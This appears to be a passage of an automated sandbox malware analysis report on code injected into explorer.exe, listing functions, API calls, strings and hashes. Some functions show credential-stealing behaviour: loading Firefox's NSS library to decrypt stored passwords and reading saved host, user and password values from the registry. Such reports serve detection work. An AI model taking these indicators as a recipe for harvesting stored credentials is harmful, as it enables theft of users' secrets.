GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 027925B8
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 027925C5
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 027925D2
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 027925DF

Part of subcall function 0279190B: lstrlen.KERNEL32(?,?,?,?,00000000,02792783), ref: 0279192B
Part of subcall function 0279190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02792783), ref: 02791930
Part of subcall function 0279190B: lstrcat.KERNEL32(00000000,?), ref: 02791946
Part of subcall function 0279190B: lstrcat.KERNEL32(00000000,00000000), ref: 0279194A

Strings

SECITEM_FreeItem, xrefs: 027925A0
NSS_Shutdown, xrefs: 02792593
PK11_FreeSlot, xrefs: 027925D4
sql:, xrefs: 0279262B
PK11_GetInternalKeySlot, xrefs: 027925AD
NSS_Init, xrefs: 0279258B
nss3.dll, xrefs: 02792510
PK11SDR_Decrypt, xrefs: 027925C7
PK11_Authenticate, xrefs: 027925BA

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
API String ID: 3366569387-3272982511
Opcode ID: 8b19d916a59f08b1e3ec1b0e4a7cb55cf86c6955b853c0d04d000721599463bf
Instruction ID: 9e5e90f81bd3448da78090b4d33b964f699d60c1370b994694ee2f5d316732e4
Opcode Fuzzy Hash: 8b19d916a59f08b1e3ec1b0e4a7cb55cf86c6955b853c0d04d000721599463bf
Instruction Fuzzy Hash: B7414430E45352EBDF14BF39785893E3BEA9B9A710B41442EE94AA7601DB358C118F61

Function 02795E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON

Download Yara Rule

APIs

Part of subcall function 02795BF5: memset.NTDLL ref: 02795C07

_alldiv.NTDLL(?,?,05265C00,00000000), ref: 027960E1
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 027960EC
_alldiv.NTDLL(?,?,000003E8,00000000), ref: 02796113
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 0279618E
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 027961B5
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 027961C1

Strings

%lld, xrefs: 02796122
%04d, xrefs: 02796016
%03d, xrefs: 027961F3
%06.3f, xrefs: 02796229
W, xrefs: 02796193
%.16g, xrefs: 02796077
%02d, xrefs: 02796039, 027961D3

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: _alldiv$_allrem$memset
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
API String ID: 2557048445-1989508764
Opcode ID: fb46fde008da7299ce788789359bb8fe7cd5933ab70b17ec94a84e04155c1c0a
Instruction ID: 88a3f47dd77db1597707376c2adbacae56962078f29e0deb15ba9c532cc00aa1
Opcode Fuzzy Hash: fb46fde008da7299ce788789359bb8fe7cd5933ab70b17ec94a84e04155c1c0a
Instruction Fuzzy Hash: ACB15EB19083519BDF279F28ECC8F3B7FDAEB85348F940759F883A6191E721D5108A91

Function 027AD2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON

Download Yara Rule

APIs

memcmp.NTDLL(027E637A,BINARY,00000007), ref: 027AD324

Strings

program, xrefs: 027AD46A
%lld, xrefs: 027AD3CA
NULL, xrefs: 027AD40F
BINARY, xrefs: 027AD31E
%s(%d), xrefs: 027AD3AB
,%d, xrefs: 027AD444
(blob), xrefs: 027AD416
vtab:%p, xrefs: 027AD423
(%.20s), xrefs: 027AD38A
%.16g, xrefs: 027AD3E5
k(%d, xrefs: 027AD2EE
,%s%s, xrefs: 027AD34E

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: memcmp
String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 1475443563-3683840195
Opcode ID: f3d5f7575ffc9dc12fbae320fd747626aab44b062c54df13dd4f2175c0c7e760
Instruction ID: c9d6b94f07d7222d7e346ee32c50cf59b9b72978216f04b5106cdfe9103f9489
Opcode Fuzzy Hash: f3d5f7575ffc9dc12fbae320fd747626aab44b062c54df13dd4f2175c0c7e760
Instruction Fuzzy Hash: 76512671504310EBDB39CF64DC54B6BB7A7AF89220F040A69FC93AB610D770E805CBA2

Function 027948B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 027919E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A1E
Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A3C
Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A75
Part of subcall function 027919E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A98

Part of subcall function 0279482C: lstrlenW.KERNEL32(?), ref: 02794845
Part of subcall function 0279482C: lstrlenW.KERNEL32(?), ref: 0279488F
Part of subcall function 0279482C: lstrlenW.KERNEL32(?), ref: 02794897

wsprintfW.USER32 ref: 027949A7
wsprintfW.USER32 ref: 027949B9

Strings

Password, xrefs: 027948E4
RemoteDirectory, xrefs: 027948F8
HostName, xrefs: 027948C4
UserName, xrefs: 027948D2
%s:%u, xrefs: 02794971, 027949B7
%s:%u/%s, xrefs: 02794982, 027949A5

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: lstrlen$QueryValuewsprintf$CloseOpen
String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
API String ID: 2889301010-4273187114
Opcode ID: 4eabc6fe479e348da407997052c820ad42ad59dddf5c13551195e9c0a7f64432
Instruction ID: 02d95f70fa4567dab9c678e607d2f1e472a340fbb4a88d05f85990c93263437a
Opcode Fuzzy Hash: 4eabc6fe479e348da407997052c820ad42ad59dddf5c13551195e9c0a7f64432
Instruction Fuzzy Hash: 47313830B043455FDF11AB69EC1492FBADEFFC9668B05491DF00997240EBB2DC028BA1

Function 0279F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?,00000000), ref: 0279FB32
memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0279FB4D
memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0279FB60
memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0279FB95

Strings

nolock, xrefs: 0279FC4E
immutable, xrefs: 0279FC68
-journal, xrefs: 0279FB6B
-wal, xrefs: 0279FBA9

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: memcpy
String ID: -journal$-wal$immutable$nolock
API String ID: 3510742995-3408036318
Opcode ID: 5ede120ff04637c869a0c5d4aece682e961d70d807ef90e30ff86a774dffbf2c
Instruction ID: a8067133c4f3034666036d30dde0e764181345766a426cb129ed9acd886a162e
Opcode Fuzzy Hash: 5ede120ff04637c869a0c5d4aece682e961d70d807ef90e30ff86a774dffbf2c
Instruction Fuzzy Hash: 21D1E3B16083418FDF15DF28D894B1ABBE6AF85314F18466DE899CB392D774D800CF62

Function 02797820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

%, xrefs: 02797822
-x0, xrefs: 02797325
NaN, xrefs: 027973F8

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID:
String ID: %$-x0$NaN
API String ID: 0-62881354
Opcode ID: e93e8e149405c8e2ae894cdbec5e37fbf4f69a316495eeacab3e22d9718a7375
Instruction ID: 860bf1ef3f1fe0cc7f190427646dd6d7dc6af1a3b1bd9860aa3d2c27f50059bb
Opcode Fuzzy Hash: e93e8e149405c8e2ae894cdbec5e37fbf4f69a316495eeacab3e22d9718a7375
Instruction Fuzzy Hash: 65D1D6B062C3818BDF2A8E28A49473BFBE6AFCA608F14495DF8C197351D764C945CB52

Function 027978B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

-x0, xrefs: 02797325
NaN, xrefs: 027973F8

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 3d16f4b0fa9bfdc2f47c391a67ed220d0734849df4da6214ac931343859bf728
Instruction ID: 58049aef2f9debd611db946af0c7f977f92bd9d9198824755bec1ddb390b539f
Opcode Fuzzy Hash: 3d16f4b0fa9bfdc2f47c391a67ed220d0734849df4da6214ac931343859bf728
Instruction Fuzzy Hash: 8EE106B062C3818FDF2D8E28A45473BFBE6AFCA608F18495DE8C297351D764C945CB52

Function 02797A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

-x0, xrefs: 02797325
NaN, xrefs: 027973F8

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 3d6a1c9dbc5dd302ed44afef1afa339c2d185757ced3d93fdd9958ca65737138
Instruction ID: b93d8e9bb83acb072dbb2f415bccd7516ba2010f1470ae834bafa7f1e1513e63
Opcode Fuzzy Hash: 3d6a1c9dbc5dd302ed44afef1afa339c2d185757ced3d93fdd9958ca65737138
Instruction Fuzzy Hash: 34E1D3B06283818BDF298E28E49473BFBE6AFCA608F14495DE8C197351D774C945CB92

Function 02797A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

-x0, xrefs: 02797325
NaN, xrefs: 027973F8

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 2102c73adb5e6cdb20581e87bfa6fdbf0c818bd9c4f5faac4c85f9d4193e18cf
Instruction ID: 9b5b81013bb4325054e90fa01a0bec6d4a8dc259e6f615d9e275ae086fd3fbab
Opcode Fuzzy Hash: 2102c73adb5e6cdb20581e87bfa6fdbf0c818bd9c4f5faac4c85f9d4193e18cf
Instruction Fuzzy Hash: C2E1D6B062C3818BDF298E28E49473BFBE6AFCA608F14495DE8C197351D774C945CB92

Function 027977F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON

Download Yara Rule

Strings

-x0, xrefs: 02797325
NaN, xrefs: 027973F8

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: b0c0c82611f0cdcd7fbe2fa0041b84ce9c24b7a6d12dae3adb804d55cc3bf463
Instruction ID: f081b50686095218aa6804e519b3aab710579a4f4ce1417a29df662c6dc8c97f
Opcode Fuzzy Hash: b0c0c82611f0cdcd7fbe2fa0041b84ce9c24b7a6d12dae3adb804d55cc3bf463
Instruction Fuzzy Hash: 3CE1C3B062C3818BDF298E28A49473BFBE6AFCA608F14495DF8C197351D764C945CB52

Function 027970C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON

Download Yara Rule

APIs

_aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0279720E
_aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 02797226
_aulldvrm.NTDLL(00000000,00000000,?), ref: 0279727B

Strings

-x0, xrefs: 02797325
NaN, xrefs: 027973F8

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: _aulldvrm$_aullrem
String ID: -x0$NaN
API String ID: 105165338-3447725786
Opcode ID: b407be1686ebbe756cfc792c4a929da0a03ac1cba61bbf4ae5905d0e60e68a21
Instruction ID: 6082313baedd5d2a491f35f2fc273c9f230031f202f01cac4ec2135979031743
Opcode Fuzzy Hash: b407be1686ebbe756cfc792c4a929da0a03ac1cba61bbf4ae5905d0e60e68a21
Instruction Fuzzy Hash: FBD1E5B062C3818BDF298E28A49473BFFE6AFCA608F18495DF8C197351D764C945CB52

Function 0279898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON

Download Yara Rule

APIs

_allmul.NTDLL(00000000,?,0000000A,00000000), ref: 02798AAD
_allmul.NTDLL(?,?,0000000A,00000000), ref: 02798B66
_allmul.NTDLL(?,00000000,0000000A,00000000), ref: 02798C9B
_alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 02798CAE

Strings

., xrefs: 02798B17

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: _allmul$_alldvrm
String ID: .
API String ID: 115548886-248832578
Opcode ID: bc9142397b779ffab4d24058882372906306e81846aa658ac6604c74841930c4
Instruction ID: 16c7b08df91a148167a43f5483eed9bf809a959d29660040ba4d963d6364837c
Opcode Fuzzy Hash: bc9142397b779ffab4d24058882372906306e81846aa658ac6604c74841930c4
Instruction Fuzzy Hash: FCD1F2B190E7858BCB109F19A48032ABBF1FFCB314F04499EF6D596281D3B58945CB87

Function 027BD684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 027BD6A0
memset.NTDLL ref: 027BD6B3
memset.NTDLL ref: 027BD6C3

Strings

,, xrefs: 027BD6FC
9, xrefs: 027BD701
7, xrefs: 027BD71B

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: memset
String ID: ,$7$9
API String ID: 2221118986-1653249994
Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction ID: fa2b267af89461a37ff3600748953b0ab119a4e78a194caa74281f97791a9a04
Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction Fuzzy Hash: DA318D715083459FD732DF60D844BCFBBE9AF89344F00892EE98997251EB719548CBA3

Function 02791BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,?,02792E75,PathToExe,00000000,00000000), ref: 02791BCC
StrStrIW.SHLWAPI(00000000,.exe,?,02792E75,PathToExe,00000000,00000000), ref: 02791BF0
StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02792E75,PathToExe,00000000,00000000), ref: 02791C05
lstrlenW.KERNEL32(00000000,?,02792E75,PathToExe,00000000,00000000), ref: 02791C1C

Strings

.exe, xrefs: 02791BEA

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: lstrlen
String ID: .exe
API String ID: 1659193697-4119554291
Opcode ID: b6e4d7c3a5d3a358b95e7247c65256bcc67041e85546be702430fc0c244c1250
Instruction ID: 2f5e0d86e047eb3f5997bbf280db429177775a27a8d8eb440f0890255065535d
Opcode Fuzzy Hash: b6e4d7c3a5d3a358b95e7247c65256bcc67041e85546be702430fc0c244c1250
Instruction Fuzzy Hash: 17F0C234B513229AEF356F34BC44ABB63A9EF0A3517519C2AE14AC7150EB708861CB69

Function 027A2FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000018), ref: 027A316F
_allmul.NTDLL(-00000001,00000000,?,?), ref: 027A31D2
_alldiv.NTDLL(?,?,00000000), ref: 027A32DE
_allmul.NTDLL(00000000,?,00000000), ref: 027A32E7
_allmul.NTDLL(?,00000000,?,?), ref: 027A3392

Part of subcall function 027A16CD: memset.NTDLL ref: 027A172B

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: _allmul$_alldivmemset
String ID:
API String ID: 3880648599-0
Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction ID: 228e168f7616a8267a3097a891684d51b53d44e8aca86b6bb6ba682e56195257
Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction Fuzzy Hash: FBD198706083418BDB25CF69C4A4B6FBBE2AFC8728F044A6DF99597250DB70D845CF92

Function 027C87FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON

Download Yara Rule

Strings

FOREIGN KEY constraint failed, xrefs: 027C8AC8
old, xrefs: 027C889E
new, xrefs: 027C88AA

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID:
String ID: FOREIGN KEY constraint failed$new$old
API String ID: 0-384346570
Opcode ID: e37a3ad241a6d1466811da576ddf503f86355205793c8b24c719774692bc7bf4
Instruction ID: 9072df517ea2c88470d29df82ea405f35c3001f64923677f3d37217b83c02478
Opcode Fuzzy Hash: e37a3ad241a6d1466811da576ddf503f86355205793c8b24c719774692bc7bf4
Instruction Fuzzy Hash: 63D11970608300AFD716EF25C885B6FBBEAAFC8754F20491EF9459B290DB74D941CB92

Function 027996BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 027996E7
_alldiv.NTDLL(00000000,80000000,?,?), ref: 02799707
_alldiv.NTDLL(00000000,80000000,?,?), ref: 02799739
_alldiv.NTDLL(00000001,80000000,?,?), ref: 0279976C
_allmul.NTDLL(?,?,?,?), ref: 02799798

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: _alldiv$_allmul
String ID:
API String ID: 4215241517-0
Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction ID: f76e5b968a956246334fc30b5e516d8471263d392ed574cc1eeabb857b1f4c6c
Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction Fuzzy Hash: F221F93110439BEAFF355D257CC4B6B7ADADB99799F24092DEF1192250FE53840085B1

Function 027AB162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000), ref: 027AB1B3
_alldvrm.NTDLL(?,?,00000000), ref: 027AB20F
_allrem.NTDLL(?,00000000,?,?), ref: 027AB28A
memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 027AB298

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: _alldvrm_allmul_allremmemcpy
String ID:
API String ID: 1484705121-0
Opcode ID: fed598beaa30dbc9f388ce9cf7ff360f3efb547d5391d65c18c7c3c258da36dc
Instruction ID: d0ca41c761e68b8c26fd72b412abf25a3e8951de4ccda8a83f686064547b5cb6
Opcode Fuzzy Hash: fed598beaa30dbc9f388ce9cf7ff360f3efb547d5391d65c18c7c3c258da36dc
Instruction Fuzzy Hash: D5415A716083019FC715EF25C8A4A2FBBE6AFD8318F445A2EF98597291DB31E805CF52

Function 02791895 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.COMBASE(?,?), ref: 027918A7
GlobalLock.KERNEL32(02794B57), ref: 027918B6
GlobalUnlock.KERNEL32(?), ref: 027918F4

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 027918E8

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
String ID:
API String ID: 1688112647-0
Opcode ID: 40ccbfffda725a5b8412f37157f38895c37d54e8ff73ec688a567af1eb1f6388
Instruction ID: 1e05cc3d657f260aad7a19624d1246f83e9631b05d40e02fcdffafece91d9276
Opcode Fuzzy Hash: 40ccbfffda725a5b8412f37157f38895c37d54e8ff73ec688a567af1eb1f6388
Instruction Fuzzy Hash: 2A016275640357AF8F029F29A818C5F7BAEEF94265B40C42AF54987210DF32D9249A60

Function 02791953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: c2d934451f9bf5ca87d1dcc9f05c80a6d24518f45aedc408fc803cd8252c0176
Instruction ID: 872c8112c59836ef6917805a21b407c2772020f691536674884f2761e6ea80b3
Opcode Fuzzy Hash: c2d934451f9bf5ca87d1dcc9f05c80a6d24518f45aedc408fc803cd8252c0176
Instruction Fuzzy Hash: CBE0E56270031D1B4A2072AE6C84E7B779CCAC95A03050039FA08D7201EA62AC1446B0

Function 027BF21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 02796A81: memset.NTDLL ref: 02796A9C

_aulldiv.NTDLL(?,00000000,?,00000000), ref: 027BF2A1

Strings

%llu, xrefs: 027BF25E
%llu, xrefs: 027BF2A8

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: _aulldivmemset
String ID: %llu$%llu
API String ID: 714058258-4283164361
Opcode ID: 08ca9f8b49f9e41129dc241cad55b7a86951026187e657b6027e582b1eace603
Instruction ID: 540af730eadf9392089a4ebfd9ec51402888b0aba05986466827c0bd35166b8f
Opcode Fuzzy Hash: 08ca9f8b49f9e41129dc241cad55b7a86951026187e657b6027e582b1eace603
Instruction Fuzzy Hash: 0321FCB2A402156BDB16AA24CC45FAFB75AEF85730F044329F922976C0DB21DD118FF2

Function 027A203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,?), ref: 027A2174
_allmul.NTDLL(?,?,?,00000000), ref: 027A220E
_allmul.NTDLL(?,00000000,00000000,?), ref: 027A2241
_allmul.NTDLL(02792E26,00000000,?,?), ref: 027A2295

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: _allmul
String ID:
API String ID: 4029198491-0
Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction ID: e73522ffcbeeed5111d7b8bf49a272a0cac281b47c434b041ec037d3829cc76a
Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction Fuzzy Hash: 12A18E707087019FDB15DF64C8A4A2FB7E6AFC8724F404A2DFA559B291EB70EC458B42

Function 027A78B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?), ref: 027A7979
memset.NTDLL ref: 027A798A
memcpy.NTDLL(?,?,?), ref: 027A7A00
memset.NTDLL ref: 027A7A14

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: a651741c4588cb1192251227ca51bc8d53f7b5756997ed564d8c5622edf68708
Instruction ID: 18424aee0a1653f8adb1d73f36fa03a908619f9ff4e707680a7c702f1635cbb1
Opcode Fuzzy Hash: a651741c4588cb1192251227ca51bc8d53f7b5756997ed564d8c5622edf68708
Instruction Fuzzy Hash: 0581AF716093149FC754DF28C894A2BBBE6FFC8724F444A6DF88A97251E770E904CB91

Function 0279190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000000,02792783), ref: 0279192B
lstrlen.KERNEL32(00000000,?,?,?,00000000,02792783), ref: 02791930
lstrcat.KERNEL32(00000000,?), ref: 02791946
lstrcat.KERNEL32(00000000,00000000), ref: 0279194A

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: b7892c2a76ea73bcc50bb496fe3162694a33bdd725b4ab1e102acc4c6963c680
Instruction ID: f09a89201af99a709403a326b92341f5fc73f75d31536d2959facb07d19c45a8
Opcode Fuzzy Hash: b7892c2a76ea73bcc50bb496fe3162694a33bdd725b4ab1e102acc4c6963c680
Instruction Fuzzy Hash: 4FE022A270031D2F0E2172AE6C84E3B77ECCAD90A130A0035FA08C3202EE62AC1186B0

Analysis Process: explorer.exePID: 7788, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	21.6%
Dynamic/Decrypted Code Coverage:	87.3%
Signature Coverage:	0%
Total number of Nodes:	181
Total number of Limit Nodes:	17

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 001930A8 Relevance: 4.7, APIs: 3, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00193104
